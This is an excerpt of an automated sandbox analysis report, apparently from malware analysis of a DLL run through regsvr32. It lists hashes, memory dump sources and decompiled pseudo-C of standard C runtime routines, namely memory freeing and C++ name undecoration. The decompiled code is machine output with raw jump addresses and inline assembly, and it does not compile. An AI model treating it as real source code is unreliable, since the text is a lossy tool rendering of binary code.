Instruction ID: a9fd8a6fc0bcf7d1748c08eee0a174f1113188a994dbe64f65169028299053e1
Opcode Fuzzy Hash: e7d0bc83decb1ad418ed8f3027fb4d453251688ca1c5686f90f413c9ceb8d8e6
Instruction Fuzzy Hash: 9931E3B080474ADBDB48CF68C88A5CE7FB0FF58398F104619E899A6250D7B89695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AFD4 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3ad11e56ad310483d7aec8c24f335e55cf22817372f631bc13dae88bc4ae88
Instruction ID: 261a21c01f508a448a75cede292c600a41cfd91173ca9120789765c36b2fd6e0
Opcode Fuzzy Hash: 6b3ad11e56ad310483d7aec8c24f335e55cf22817372f631bc13dae88bc4ae88
Instruction Fuzzy Hash: 7D317BB05087848BD748DF28D15A41EBBE1BB8D308F404B2DF4CAAB290D778D604CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A764 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded468ddb96ed6cf85f2a74971ab597a0818c752bb42b8cabf8dbd32b2f8b18e
Instruction ID: 463c539b1b6c2e62265add9d8f0240bca0ce0cba84eaf8db37319ed3ee0766ec
Opcode Fuzzy Hash: ded468ddb96ed6cf85f2a74971ab597a0818c752bb42b8cabf8dbd32b2f8b18e
Instruction Fuzzy Hash: 8F214CB45087848BD348EF28D45951ABBE1BB9C318F404B2DF4CAA7261D7B8DA45CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B076274 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FFD2B076289

Part of subcall function 00007FFD2B06640C: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066422
Part of subcall function 00007FFD2B06640C: _errno.LIBCMT ref: 00007FFD2B06642C
Part of subcall function 00007FFD2B06640C: GetLastError.KERNEL32(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066434

free.LIBCMT ref: 00007FFD2B076292
free.LIBCMT ref: 00007FFD2B07629B
free.LIBCMT ref: 00007FFD2B0762A4
free.LIBCMT ref: 00007FFD2B0762AD
free.LIBCMT ref: 00007FFD2B0762B6
free.LIBCMT ref: 00007FFD2B0762BE
free.LIBCMT ref: 00007FFD2B0762C7
free.LIBCMT ref: 00007FFD2B0762D0
free.LIBCMT ref: 00007FFD2B0762D9
free.LIBCMT ref: 00007FFD2B0762E2
free.LIBCMT ref: 00007FFD2B0762EB
free.LIBCMT ref: 00007FFD2B0762F4
free.LIBCMT ref: 00007FFD2B0762FD
free.LIBCMT ref: 00007FFD2B076306
free.LIBCMT ref: 00007FFD2B07630F
free.LIBCMT ref: 00007FFD2B07631B
free.LIBCMT ref: 00007FFD2B076327
free.LIBCMT ref: 00007FFD2B076333
free.LIBCMT ref: 00007FFD2B07633F
free.LIBCMT ref: 00007FFD2B07634B
free.LIBCMT ref: 00007FFD2B076357
free.LIBCMT ref: 00007FFD2B076363
free.LIBCMT ref: 00007FFD2B07636F
free.LIBCMT ref: 00007FFD2B07637B
free.LIBCMT ref: 00007FFD2B076387
free.LIBCMT ref: 00007FFD2B076393
free.LIBCMT ref: 00007FFD2B07639F
free.LIBCMT ref: 00007FFD2B0763AB
free.LIBCMT ref: 00007FFD2B0763B7
free.LIBCMT ref: 00007FFD2B0763C3
free.LIBCMT ref: 00007FFD2B0763CF
free.LIBCMT ref: 00007FFD2B0763DB
free.LIBCMT ref: 00007FFD2B0763E7
free.LIBCMT ref: 00007FFD2B0763F3
free.LIBCMT ref: 00007FFD2B0763FF
free.LIBCMT ref: 00007FFD2B07640B
free.LIBCMT ref: 00007FFD2B076417
free.LIBCMT ref: 00007FFD2B076423
free.LIBCMT ref: 00007FFD2B07642F
free.LIBCMT ref: 00007FFD2B07643B
free.LIBCMT ref: 00007FFD2B076447
free.LIBCMT ref: 00007FFD2B076453
free.LIBCMT ref: 00007FFD2B07645F
free.LIBCMT ref: 00007FFD2B07646B
free.LIBCMT ref: 00007FFD2B076477
free.LIBCMT ref: 00007FFD2B076483
free.LIBCMT ref: 00007FFD2B07648F
free.LIBCMT ref: 00007FFD2B07649B
free.LIBCMT ref: 00007FFD2B0764A7
free.LIBCMT ref: 00007FFD2B0764B3
free.LIBCMT ref: 00007FFD2B0764BF
free.LIBCMT ref: 00007FFD2B0764CB
free.LIBCMT ref: 00007FFD2B0764D7
free.LIBCMT ref: 00007FFD2B0764E3
free.LIBCMT ref: 00007FFD2B0764EF
free.LIBCMT ref: 00007FFD2B0764FB
free.LIBCMT ref: 00007FFD2B076507
free.LIBCMT ref: 00007FFD2B076513
free.LIBCMT ref: 00007FFD2B07651F
free.LIBCMT ref: 00007FFD2B07652B
free.LIBCMT ref: 00007FFD2B076537
free.LIBCMT ref: 00007FFD2B076543
free.LIBCMT ref: 00007FFD2B07654F
free.LIBCMT ref: 00007FFD2B07655B
free.LIBCMT ref: 00007FFD2B076567
free.LIBCMT ref: 00007FFD2B076573
free.LIBCMT ref: 00007FFD2B07657F
free.LIBCMT ref: 00007FFD2B07658B
free.LIBCMT ref: 00007FFD2B076597
free.LIBCMT ref: 00007FFD2B0765A3
free.LIBCMT ref: 00007FFD2B0765AF
free.LIBCMT ref: 00007FFD2B0765BB
free.LIBCMT ref: 00007FFD2B0765C7
free.LIBCMT ref: 00007FFD2B0765D3
free.LIBCMT ref: 00007FFD2B0765DF
free.LIBCMT ref: 00007FFD2B0765EB
free.LIBCMT ref: 00007FFD2B0765F7
free.LIBCMT ref: 00007FFD2B076603
free.LIBCMT ref: 00007FFD2B07660F
free.LIBCMT ref: 00007FFD2B07661B
free.LIBCMT ref: 00007FFD2B076627
free.LIBCMT ref: 00007FFD2B076633
free.LIBCMT ref: 00007FFD2B07663F
free.LIBCMT ref: 00007FFD2B07664B
free.LIBCMT ref: 00007FFD2B076657

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$ErrorLastPrivilegeRelease_errno
String ID:
API String ID: 1805546551-0
Opcode ID: d6e8cc12211084a7c38c37855535bf0a3e62d60420018dd71de056c538f756e4
Instruction ID: 89b92ddf74e21a9509e660a55a72b990308cd4943e9793a4151dc4000f48efd4
Opcode Fuzzy Hash: d6e8cc12211084a7c38c37855535bf0a3e62d60420018dd71de056c538f756e4
Instruction Fuzzy Hash: 33A1652171A556C9EA42BFB1CDB62FC2320AFC6B44F044132DB4D4B177CEB6D84693A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06C7D0 Relevance: 79.2, APIs: 42, Strings: 3, Instructions: 437
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD2B06C7D0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __r8, void* __r10, void* __r11) {
				char _t48;
				void* _t62;
				void* _t64;
				void* _t71;
				void* _t85;
				char* _t87;
				char* _t90;
				intOrPtr* _t94;
				long long _t95;
				intOrPtr* _t105;
				void* _t121;
				intOrPtr _t124;
				void* _t126;
				void* _t127;
				void* _t129;

				_t123 = __rsi;
				_t64 = __edx;
				_t85 = _t129;
				 *((long long*)(_t85 + 8)) = __rbx;
				 *((long long*)(_t85 + 0x10)) = __rsi;
				 *((long long*)(_t85 + 0x20)) = __rdi;
				 *((long long*)(_t85 + 0x18)) = __r8;
				_t5 = _t85 - 0x5f; // -230
				_t127 = _t5;
				_t90 =  *0x2b0c9a70; // 0x0
				r8d = 0;
				_t121 = __rcx;
				_t48 =  *_t90;
				 *(_t127 - 0x61) =  *(_t127 - 0x61) & 0xffff0000;
				 *(_t127 - 0x71) =  *(_t127 - 0x71) & 0xffff0000;
				 *((long long*)(_t127 - 0x69)) = __r8;
				 *((long long*)(_t127 - 0x79)) = __r8;
				 *0x2b0c9a70 = _t90 + 1;
				_t71 = _t48 - 0x41;
				if (_t71 > 0) goto 0x2b06c9df;
				if (_t71 == 0) goto 0x2b06cecf;
				if (_t48 == 0) goto 0x2b06c9c6;
				if (_t48 - 0x2f <= 0) goto 0x2b06cafe;
				if (_t48 - 0x31 <= 0) goto 0x2b06c8a3;
				if (_t48 - 0x39 > 0) goto 0x2b06cafe;
				_t17 = _t127 - 0x69; // -335
				E00007FFD7FFD2B06AD7C(_t17,  *((intOrPtr*)(0x7ffd2b060000 + 0x23900 +  *(_t90 + 1 - 1) * 8)));
				if ( *((long long*)(_t127 - 0x69)) == 0) goto 0x2b06c9a2;
				_t19 = _t127 - 0x39; // -287
				E00007FFD7FFD2B06A9E0(_t19, "operator");
				_t20 = _t127 - 0x69; // -335
				_t21 = _t127 - 0x59; // -319
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x59], xmm0");
				E00007FFD7FFD2B06AC78(_t85, _t21, _t20);
				asm("movaps xmm0, [ebp-0x59]");
				goto 0x2b06c9a6;
				 *(_t127 - 0x71) =  *(_t127 - 0x71) & 0xffff0000;
				 *((long long*)(_t127 - 0x79)) = __r8;
				if (_t64 == 0) goto 0x2b06c93f;
				_t25 = _t127 - 9; // -239
				E00007FFD7FFD2B06C55C(0x7ffd2b060000, _t25, _t20, _t121, __rsi, __r8, __r10, __r11);
				_t26 = _t127 - 0x49; // -303
				E00007FFD7FFD2B06A9A8(0x3c, _t85, _t26);
				_t27 = _t127 - 0x59; // -319
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x59], xmm0");
				E00007FFD7FFD2B06AC78(_t85, _t27, _t85);
				_t28 = _t127 - 0x59; // -319
				_t29 = _t127 - 0x79; // -351
				E00007FFD7FFD2B06AC78(_t85, _t29, _t28);
				_t105 =  *((intOrPtr*)(_t127 - 0x79));
				if (_t105 == 0) goto 0x2b06c908;
				if ( *((intOrPtr*)( *_t105 + 8))() != 0x3e) goto 0x2b06c908;
				_t32 = _t127 - 0x79; // -351
				E00007FFD7FFD2B06AF5C(0x20, r8d,  *_t105, _t85, _t32, _t123, __r8, _t126);
				_t33 = _t127 - 0x79; // -351
				E00007FFD7FFD2B06AF5C(0x3e, r8d,  *_t105, _t85, _t33, _t123, __r8);
				_t87 =  *((intOrPtr*)(_t127 + 0x77));
				if (_t87 == 0) goto 0x2b06c91f;
				 *_t87 = 1;
				_t94 =  *0x2b0c9a70; // 0x0
				if ( *_t94 != sil) goto 0x2b06c931;
				asm("movups xmm0, [ebp-0x79]");
				goto 0x2b06c9a6;
				_t124 =  *((intOrPtr*)(_t127 - 0x79));
				_t95 = _t94 + 1;
				 *0x2b0c9a70 = _t95;
				_t36 = _t127 + 0x47; // -159
				r8d = 0;
				E00007FFD7FFD2B06D0E0(0xffff0000, 0, r8d, _t95, _t36, _t121, _t124, __r8, __r10, __r11);
				asm("movups xmm0, [eax]");
				 *0x2b0c9a70 = _t95;
				asm("movaps [ebp-0x69], xmm0");
				if ( *((long long*)(_t127 - 0x69)) == 0) goto 0x2b06c990;
				if ( *((char*)(_t95 - 1)) != 0x31) goto 0x2b06c990;
				_t39 = _t127 - 0x49; // -303
				E00007FFD7FFD2B06A9A8(0x7e, _t87, _t39);
				_t40 = _t127 - 0x69; // -335
				_t41 = _t127 - 0x59; // -319
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x59], xmm0");
				E00007FFD7FFD2B06AC78(_t87, _t41, _t40);
				asm("movaps xmm0, [ebp-0x59]");
				asm("movaps [ebp-0x69], xmm0");
				if (_t124 == 0) goto 0x2b06c9a6;
				_t42 = _t127 - 0x79; // -351
				_t43 = _t127 - 0x69; // -335
				_t62 = E00007FFD7FFD2B06AC78(_t87, _t43, _t42);
				asm("movaps xmm0, [ebp-0x69]");
				asm("movdqu [edi], xmm0");
				return _t62;
			}

0x7ffd2b06c7d0
0x7ffd2b06c7d0
0x7ffd2b06c7d0
0x7ffd2b06c7d3
0x7ffd2b06c7d7
0x7ffd2b06c7db
0x7ffd2b06c7df
0x7ffd2b06c7e4
0x7ffd2b06c7e4
0x7ffd2b06c7ef
0x7ffd2b06c7f6
0x7ffd2b06c7f9
0x7ffd2b06c7fc
0x7ffd2b06c807
0x7ffd2b06c80a
0x7ffd2b06c80d
0x7ffd2b06c811
0x7ffd2b06c818
0x7ffd2b06c81f
0x7ffd2b06c822
0x7ffd2b06c828
0x7ffd2b06c830
0x7ffd2b06c839
0x7ffd2b06c842
0x7ffd2b06c847
0x7ffd2b06c861
0x7ffd2b06c865
0x7ffd2b06c86f
0x7ffd2b06c87c
0x7ffd2b06c880
0x7ffd2b06c885
0x7ffd2b06c889
0x7ffd2b06c88d
0x7ffd2b06c890
0x7ffd2b06c895
0x7ffd2b06c89a
0x7ffd2b06c89e
0x7ffd2b06c8a3
0x7ffd2b06c8a6
0x7ffd2b06c8ac
0x7ffd2b06c8b2
0x7ffd2b06c8b6
0x7ffd2b06c8bb
0x7ffd2b06c8c4
0x7ffd2b06c8c9
0x7ffd2b06c8d0
0x7ffd2b06c8d3
0x7ffd2b06c8d8
0x7ffd2b06c8dd
0x7ffd2b06c8e1
0x7ffd2b06c8e5
0x7ffd2b06c8ea
0x7ffd2b06c8f1
0x7ffd2b06c8fb
0x7ffd2b06c8fd
0x7ffd2b06c903
0x7ffd2b06c908
0x7ffd2b06c90e
0x7ffd2b06c913
0x7ffd2b06c91a
0x7ffd2b06c91c
0x7ffd2b06c91f
0x7ffd2b06c929
0x7ffd2b06c92b
0x7ffd2b06c92f
0x7ffd2b06c931
0x7ffd2b06c935
0x7ffd2b06c938
0x7ffd2b06c93f
0x7ffd2b06c943
0x7ffd2b06c948
0x7ffd2b06c94d
0x7ffd2b06c950
0x7ffd2b06c957
0x7ffd2b06c960
0x7ffd2b06c966
0x7ffd2b06c968
0x7ffd2b06c96e
0x7ffd2b06c973
0x7ffd2b06c977
0x7ffd2b06c97b
0x7ffd2b06c97e
0x7ffd2b06c983
0x7ffd2b06c988
0x7ffd2b06c98c
0x7ffd2b06c993
0x7ffd2b06c995
0x7ffd2b06c999
0x7ffd2b06c99d
0x7ffd2b06c9a2
0x7ffd2b06c9a6
0x7ffd2b06c9c5

APIs

DName::DName.LIBCMT ref: 00007FFD2B06C880

Part of subcall function 00007FFD2B06A9E0: DName::doPchar.LIBCMT ref: 00007FFD2B06AA19

DName::operator+=.LIBCMT ref: 00007FFD2B06C895
DName::operator+=.LIBCMT ref: 00007FFD2B06CC39
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06CC42
DName::operator+=.LIBCMT ref: 00007FFD2B06CC55
DName::operator+=.LIBCMT ref: 00007FFD2B06CC62
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06CC6B
DName::operator+=.LIBCMT ref: 00007FFD2B06CC7E
DName::operator+=.LIBCMT ref: 00007FFD2B06CC8B
UnDecorator::getSignedDimension.LIBCMT ref: 00007FFD2B06CC94
DName::operator+=.LIBCMT ref: 00007FFD2B06CCA7
DName::operator+=.LIBCMT ref: 00007FFD2B06CCB4
DName::operator+=.LIBCMT ref: 00007FFD2B06CCD2
DName::operator+=.LIBCMT ref: 00007FFD2B06CCDF
DName::operator+=.LIBCMT ref: 00007FFD2B06CCF1
DName::operator+=.LIBCMT ref: 00007FFD2B06CD15
DName::operator+=.LIBCMT ref: 00007FFD2B06CD2B
DName::operator=.LIBCMT ref: 00007FFD2B06CD6C

Part of subcall function 00007FFD2B06C7D0: UnDecorator::getZName.LIBCMT ref: 00007FFD2B06C948
Part of subcall function 00007FFD2B06C7D0: DName::DName.LIBCMT ref: 00007FFD2B06C96E
Part of subcall function 00007FFD2B06C7D0: DName::operator+=.LIBCMT ref: 00007FFD2B06C983
Part of subcall function 00007FFD2B06C7D0: DName::operator+=.LIBCMT ref: 00007FFD2B06C99D

DName::DName.LIBCMT ref: 00007FFD2B06CE28
DName::operator+=.LIBCMT ref: 00007FFD2B06CE49
UnDecorator::getSymbolName.LIBCMT ref: 00007FFD2B06CE6A
DName::operator+=.LIBCMT ref: 00007FFD2B06CE76
DName::operator+=.LIBCMT ref: 00007FFD2B06CE86
DName::operator=.LIBCMT ref: 00007FFD2B06C865

Part of subcall function 00007FFD2B06AD7C: DName::doPchar.LIBCMT ref: 00007FFD2B06ADAB

DName::DName.LIBCMT ref: 00007FFD2B06C8C4
DName::operator+=.LIBCMT ref: 00007FFD2B06C8D8
DName::operator+=.LIBCMT ref: 00007FFD2B06C8E5
DName::operator+=.LIBCMT ref: 00007FFD2B06C903
DName::operator+=.LIBCMT ref: 00007FFD2B06C90E
DName::DName.LIBCMT ref: 00007FFD2B06CA5F
DName::DName.LIBCMT ref: 00007FFD2B06CAA4
DName::operator=.LIBCMT ref: 00007FFD2B06CB59
DNameStatusNode::make.LIBCMT ref: 00007FFD2B06CB86
DName::append.LIBCMT ref: 00007FFD2B06CB91
DName::operator=.LIBCMT ref: 00007FFD2B06CBA0
DName::operator=.LIBCMT ref: 00007FFD2B06CBCE
DName::operator+=.LIBCMT ref: 00007FFD2B06CC0D
DName::operator=.LIBCMT ref: 00007FFD2B06CEE7

Strings

operator, xrefs: 00007FFD2B06C875
`anonymous namespace', xrefs: 00007FFD2B06CB11
`string', xrefs: 00007FFD2B06CACE

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::Name::operator=$Decorator::get$DimensionSigned$Name::doPchar$Name::appendNode::makeStatusSymbol
String ID: `anonymous namespace'$`string'$operator
API String ID: 3844726095-815891235
Opcode ID: db28f363c5dc400984ced6ef5b73e08a8fb1a742ba817ff342aa26a93fec3060
Instruction ID: 06894a2798a5b2baf51bc958e4f76c4d3ebd513f4dd87f293ed536c5ad00c1b9
Opcode Fuzzy Hash: db28f363c5dc400984ced6ef5b73e08a8fb1a742ba817ff342aa26a93fec3060
Instruction Fuzzy Hash: 9722CA22F09A4289FB229B75CA622FC2371AF1774CF545131CA4E565B9DFACE185E3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06FC30 Relevance: 72.0, APIs: 18, Strings: 23, Instructions: 269
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD2B06FC30(void* __ebx, void* __ecx, void* __esi, void* __rax, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10, void* __r11, long long _a8, void* _a16, void* _a24) {
				char _v40;
				char _v56;
				signed int _v64;
				char _v72;
				signed int _v80;
				char _v88;
				signed int _v96;
				signed int _v104;
				void* __rdi;
				void* __rsi;
				signed int _t56;
				void* _t57;
				signed int _t58;
				void* _t63;
				signed int _t67;
				signed int _t84;
				signed char _t89;
				void* _t90;
				void* _t96;
				void* _t103;
				void* _t143;
				signed int* _t150;
				signed char* _t152;
				char* _t156;
				signed long long* _t158;
				char* _t162;
				long long* _t205;
				void* _t211;
				void* _t212;

				_t223 = __r11;
				_t222 = __r10;
				_t143 = __rax;
				_t94 = __esi;
				_t90 = __ecx;
				_a8 = __rbx;
				_a16 = __rdx;
				_t211 = __rcx;
				_t150 =  *0x2b0c9a70; // 0x0
				sil =  *_t150;
				if (sil == 0) goto 0x2b070035;
				_v104 = _v104 & 0x00000000;
				_v96 = _v96 & 0xffff0000;
				_t56 = sil & 0xffffffff;
				 *0x2b0c9a70 =  &(_t150[0]);
				_a24 = 0;
				_t96 = _t56 - 0x4e;
				if (_t96 > 0) goto 0x2b06fce5;
				if (_t96 == 0) goto 0x2b06ff02;
				if (_t56 - 0x43 < 0) goto 0x2b06fecc;
				if (_t56 - 0x45 <= 0) goto 0x2b06fcdc;
				if (_t56 - 0x47 <= 0) goto 0x2b06fcd3;
				if (_t56 - 0x49 <= 0) goto 0x2b06fcca;
				if (_t56 - 0x4b <= 0) goto 0x2b06fcc1;
				if (_t56 != 0x4d) goto 0x2b06fecc;
				_t152 =  &_v104;
				_t57 = E00007FFD7FFD2B06AD7C(_t152, "float");
				goto 0x2b06ff1f;
				goto 0x2b06fcb3;
				goto 0x2b06fcb3;
				goto 0x2b06fcb3;
				goto 0x2b06fcb3;
				_t103 = _t57 - 0x4f;
				if (_t103 == 0) goto 0x2b06fef2;
				if (_t103 <= 0) goto 0x2b06fecc;
				if (_t57 - 0x53 <= 0) goto 0x2b06fec5;
				if (_t57 == 0x58) goto 0x2b06feb9;
				if (_t57 != 0x5f) goto 0x2b06fecc;
				_t84 =  *_t152 & 0x000000ff;
				_t58 = _t84;
				 *0x2b0c9a70 =  &(_t152[1]);
				if (_t84 - 0x4d > 0) goto 0x2b06fddb;
				if (_t58 - 0x4c >= 0) goto 0x2b06fdcf;
				if (_t58 - 0x47 > 0) goto 0x2b06fdae;
				if (_t58 - 0x46 >= 0) goto 0x2b06fda5;
				if (_t58 == 0) goto 0x2b06fd88;
				if (_t58 == 0x24) goto 0x2b06fd64;
				if (_t58 + 0xffffffbc - 1 > 0) goto 0x2b06fe29;
				E00007FFD7FFD2B06AD7C( &_v104, "__int8");
				goto 0x2b06ff22;
				E00007FFD7FFD2B06FC30(_t84, _t90, __esi, _t143, __rbx,  &_v72, "__int8", __r8, __r10, __r11);
				_t156 =  &_v88;
				_t146 = _t143;
				E00007FFD7FFD2B06A9E0(_t156, "__w64 ");
				goto 0x2b070047;
				 *0x2b0c9a70 = _t156 - 1;
				_t158 =  &_v104;
				_t63 = E00007FFD7FFD2B06A640(1, _t143, _t158);
				goto 0x2b06ff22;
				goto 0x2b06fd56;
				if (_t63 - 0x48 < 0) goto 0x2b06fe29;
				if (_t63 - 0x49 <= 0) goto 0x2b06fdc6;
				if (_t63 - 0x4b > 0) goto 0x2b06fe29;
				goto 0x2b06fd56;
				goto 0x2b06fd56;
				goto 0x2b06fd56;
				if (_t63 == 0x4e) goto 0x2b06fead;
				if (_t63 == 0x4f) goto 0x2b06fe4d;
				if (_t63 == 0x52) goto 0x2b06fe41;
				if (_t63 == 0x57) goto 0x2b06fe35;
				if (_t63 + 0xffffffa8 - 1 > 0) goto 0x2b06fe29;
				 *0x2b0c9a70 = _t158 - 1;
				E00007FFD7FFD2B06D488(1, _t63 + 0xffffffa8 - 1, _t143, _t143,  &_v56, _t211, _t212, __r8, __r10, __r11);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x50], xmm0");
				if (_v104 != 0) goto 0x2b06ff22;
				asm("movdqu [edi], xmm0");
				goto 0x2b070056;
				goto 0x2b06fd56;
				goto 0x2b06fd56;
				goto 0x2b06fd56;
				asm("movups xmm0, [edx]");
				_v104 = _v104 & 0x00000000;
				_v96 = _v96 & 0xffff0000;
				asm("movdqu [ebp-0x40], xmm0");
				if (0xfffffffe != 0xfffffffe) goto 0x2b06ffd5;
				_t218 =  &_v88;
				_v80 = _v80 | 0x00000800;
				E00007FFD7FFD2B06F88C(_t90, 1, _t94, _t143,  &_v72,  &_v104, _t211, _t212,  &_v88, 0x2b08398d, __r10, __r11);
				if ((_v64 & 0x00000800) != 0) goto 0x2b06fea4;
				_t162 =  &_v72;
				_t67 = E00007FFD7FFD2B06AFE0(_t90, _t94, _t143, _t146, _t162, "[]", _t212,  &_v88);
				asm("movups xmm0, [ebp-0x30]");
				goto 0x2b06fe20;
				goto 0x2b06fd56;
				goto 0x2b06fcb3;
				goto 0x2b06ff16;
				 *0x2b0c9a70 = _t162 - 1;
				E00007FFD7FFD2B06D488(1, _v64 & 0x00000800, _t143, _t146,  &_v40, _t211, _t212,  &_v88, _t222, _t223);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x50], xmm0");
				if (_v104 != 0) goto 0x2b06ff1f;
				goto 0x2b06fe20;
				E00007FFD7FFD2B06AD7C( &_v104, "long ");
				E00007FFD7FFD2B06AFE0(_t90, _t94, _t143, _t146,  &_v104, "double", _t212, _t218);
				if ((_t67 & 0x00000003) != 0xffffffff) goto 0x2b06fe52;
				_t89 = _a24;
				if (sil == 0x43) goto 0x2b06ff68;
				if (sil == 0x45) goto 0x2b06ff5f;
				if (sil == 0x47) goto 0x2b06ff5f;
				if (sil == 0x49) goto 0x2b06ff5f;
				if (sil == 0x4b) goto 0x2b06ff5f;
				if (sil != 0x5f) goto 0x2b06ff96;
				if (_t89 == 0x45) goto 0x2b06ff5f;
				if (_t89 == 0x47) goto 0x2b06ff5f;
				if (_t89 == 0x49) goto 0x2b06ff5f;
				if (_t89 == 0x4b) goto 0x2b06ff5f;
				if (_t89 != 0x4d) goto 0x2b06ff96;
				goto 0x2b06ff6f;
				E00007FFD7FFD2B06A9E0( &_v40, "signed ");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t143,  &_v72,  &_v104);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqa [ebp-0x50], xmm5");
				_t147 = _a16;
				if ( *_a16 == 0) goto 0x2b06ffcc;
				E00007FFD7FFD2B06A9A8(0x20, _t143,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t143,  &_v72, _a16);
				_t205 =  &_v72;
				E00007FFD7FFD2B06AC78(_t143,  &_v104, _t205);
				asm("movaps xmm0, [ebp-0x50]");
				goto 0x2b06fe20;
				if ( *_t205 != 0) goto 0x2b07001c;
				if ((_t89 & 0x00000001) == 0) goto 0x2b070007;
				E00007FFD7FFD2B06AD7C( &_v104, "const");
				if ((_t89 & 0x00000002) == 0) goto 0x2b07001c;
				E00007FFD7FFD2B06AFE0(_t90, _t94, _t143, _t147,  &_v104, " volatile", _t212, _t218);
				goto 0x2b07001c;
				if ((_t89 & 0x00000002) == 0) goto 0x2b07001c;
				E00007FFD7FFD2B06AD7C( &_v104, "volatile");
				E00007FFD7FFD2B06F88C(_t90, 0x20, _t94, _t147, _t211,  &_v104, _t211, _t212,  &_v88, 0x2b083950, _t222, _t223);
				goto 0x2b070056;
				E00007FFD7FFD2B06A490(1, _t143,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [edi], xmm0");
				return E00007FFD7FFD2B06AC78(_t143, _t211, _a16);
			}

0x7ffd2b06fc30
0x7ffd2b06fc30
0x7ffd2b06fc30
0x7ffd2b06fc30
0x7ffd2b06fc30
0x7ffd2b06fc30
0x7ffd2b06fc35
0x7ffd2b06fc44
0x7ffd2b06fc47
0x7ffd2b06fc4e
0x7ffd2b06fc54
0x7ffd2b06fc5a
0x7ffd2b06fc5f
0x7ffd2b06fc69
0x7ffd2b06fc70
0x7ffd2b06fc77
0x7ffd2b06fc7b
0x7ffd2b06fc7e
0x7ffd2b06fc80
0x7ffd2b06fc89
0x7ffd2b06fc92
0x7ffd2b06fc97
0x7ffd2b06fc9c
0x7ffd2b06fca1
0x7ffd2b06fca6
0x7ffd2b06fcb3
0x7ffd2b06fcb7
0x7ffd2b06fcbc
0x7ffd2b06fcc8
0x7ffd2b06fcd1
0x7ffd2b06fcda
0x7ffd2b06fce3
0x7ffd2b06fce5
0x7ffd2b06fce8
0x7ffd2b06fcee
0x7ffd2b06fcf7
0x7ffd2b06fd00
0x7ffd2b06fd09
0x7ffd2b06fd0f
0x7ffd2b06fd15
0x7ffd2b06fd17
